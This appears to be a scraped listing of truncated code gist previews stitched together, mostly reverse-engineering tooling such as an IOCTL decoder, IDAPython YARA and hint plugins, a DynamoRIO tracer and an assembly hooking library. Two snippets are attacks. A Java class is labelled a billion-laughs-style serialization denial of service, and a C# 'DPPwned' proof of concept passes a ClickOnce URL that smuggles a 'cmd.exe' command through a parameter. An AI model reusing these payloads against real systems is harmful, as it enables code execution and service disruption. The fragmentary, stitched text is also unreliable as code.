| ############################################################################################ | |
| ## | |
| ## Quick IOCTL Decoder! | |
| ## | |
| ## All credit for actual IOCTL decode logic: | |
| ## http://www.osronline.com/article.cfm?article=229 | |
| ## | |
| ## | |
| ## To install: | |
| ## Copy script into plugins directory, i.e: C:\Program Files\IDA 6.8\plugins |
| ''' | |
| IDAPython script that generates a YARA rule to match against the | |
| basic blocks of the current function. It masks out relocation bytes | |
| and ignores jump instructions (given that we're already trying to | |
| match compiler-specific bytes, this is of arguable benefit). | |
| If python-yara is installed, the IDAPython script also validates that | |
| the generated rule matches at least one segment in the current file. | |
| author: Willi Ballenthin <william.ballenthin@fireeye.com> |
| import java.io.ByteArrayInputStream; | |
| import java.io.ByteArrayOutputStream; | |
| import java.io.IOException; | |
| import java.io.ObjectInputStream; | |
| import java.io.ObjectOutputStream; | |
| import java.util.HashSet; | |
| import java.util.Set; | |
| // billion-laughs-style DoS for java serialization | |
| public class SerialDOS { |
| using System; | |
| using System.Runtime.InteropServices; | |
| class DPPwned { | |
| [DllImport("dfshim.dll")] | |
| public static extern int LaunchApplication([MarshalAs(UnmanagedType.LPWStr)] string deploymentUrl,int data,int flags); | |
| public static void Main() { | |
| LaunchApplication("https://onestepfreinstaller.blob.core.windows.net/installer/DPLauncher.application?SelectedItems=%22+%2FC%3A%22cmd.exe+%2Fk+echo+pwned+%26%26+rem+",0,0); |
| /* | |
| * Naive hit tracer implementation using DynamoRIO. | |
| * | |
| * Author: axt | |
| * | |
| * Build it with the following commands: | |
| * gcc -Dbbhit_EXPORTS -DSHOW_RESULTS -DSHOW_SYMBOLS -fPIC -I../include -I../ext/include -DX86_64 -DLINUX -O2 -fno-stack-protector -o bbhit.c.o -c bbhit.c | |
| * gcc -fPIC -O2 -DX86_64 -DLINUX -fno-stack-protector -fPIC -shared -lgcc -Wl,--hash-style=both -shared -Wl,-soname,libbbhit.so -o libbbhit.so bbhit.c.o ../lib64/debug/libdynamorio.so.4.2 ../ext/lib64/debug/libdrsyms.so | |
| */ | |
| #include <stddef.h> |
| ''' | |
| IDA plugin to display the calls and strings referenced by a function as hints. | |
| Installation: put this file in your %IDADIR%/plugins/ directory. | |
| Author: Willi Ballenthin <william.ballenthin@fireeye.com> | |
| Licence: Apache 2.0 | |
| ''' | |
| import idc | |
| import idaapi | |
| import idautils |
| #!/usr/bin/env python2 | |
| ''' | |
| some documentation | |
| author: Willi Ballenthin | |
| email: willi.ballenthin@gmail.com | |
| website: https://gist.github.com/williballenthin/d43cbc98fa127211c9099f46d2e73d2c | |
| ''' | |
| import sys | |
| import logging | |
| from collections import namedtuple |
| comment *========================================== | |
| jagHook by jAgx | |
| Note that: | |
| macros are like win32 api; they may modify all registers but ebx, edi, esi | |
| your .text section needs to be writable if using the non-procedural hooking | |
| if using radasm, add /SECTION:.text|RWE the LINK box under Project -> Project Options] | |
| otherwise, just add /SECTION:.text,RWE to linking arguments | |
| comment *========================================== | |
| jagHook | |
| Note that: | |
| macros are like win32 api; they may modify all registers but ebx, edi, esi | |
| your .text section needs to be writable if using the non-procedural hooking | |
| if using radasm, add /SECTION:.text|RWE the LINK box under Project -> Project Options] | |
| otherwise, just add /SECTION:.text,RWE to linking arguments | |
In the below documentation, all requests return { "d": something } (except the ones that don't), so everything outside of something will be omitted.
Necessary headers for each request (may vary, untested):